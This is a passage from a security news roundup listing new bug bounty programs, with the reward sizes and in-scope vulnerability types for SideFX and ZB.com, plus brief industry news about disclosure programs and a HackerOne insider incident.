**Commenting on the partnership, Alex Valle, chief product officer at Onfido, said: “Security and compliance are essential to our mission of creating a more open world, where identity is the key to online access, and we are always looking for ways to strengthen this.”

Check out our earlier coverage for more details

**SideFX**

**Program provider:  
**HackerOne

**Program type:**  
Public

**Max reward:**  
$3,000

**Outline:**  
Canada-based SideFX is the developer of Houdini, a 3D animation software application used in film, television, advertising, and video games.

**Notes:**  
Only vulnerabilities discovered in the company’s main web domain, sidefx.com, are applicable under the terms of this new bug bounty program.

Check out the SideFX bug bounty page for more details

**ZBWeb**

**Program provider:**  
HackenProof

**Program type:**  
Public

**Max reward:**  
$5,000

**Outline:**  
Founded in 2013, ZB.com is a worldwide digital trading platform, facilitating the exchange and management of digital assets from all corners of the globe.

**Notes:**  
In-scope web vulnerabilities include business logic issues, payment manipulation, RCE, SQL injection, access control issues, SSRF, CSRF, XSS, and other vulnerabilities with a “clear potential loss”.

Check out the ZBWeb bug bounty page for more details

**Other bug bounty and VDP news this month**

*   **HackerOne** has disclosed details of an incident involving a former employee who was accused of accessing internal data for personal financial gain.
*   **Go Daddy**, **Trellix**, and **Fidelity** have launched (unpaid) vulnerability disclosure programs (VDPs).
*   Advertising platform developer and social media company **Meta** has released its inaugural ‘Bug Bulletin’, which includes details of some of the notable finds identified in its own, and in third-party, code.

**PREVIOUS EDITION** Bug Bounty Radar // The latest bug bounty programs for July 2022

Tag

#apple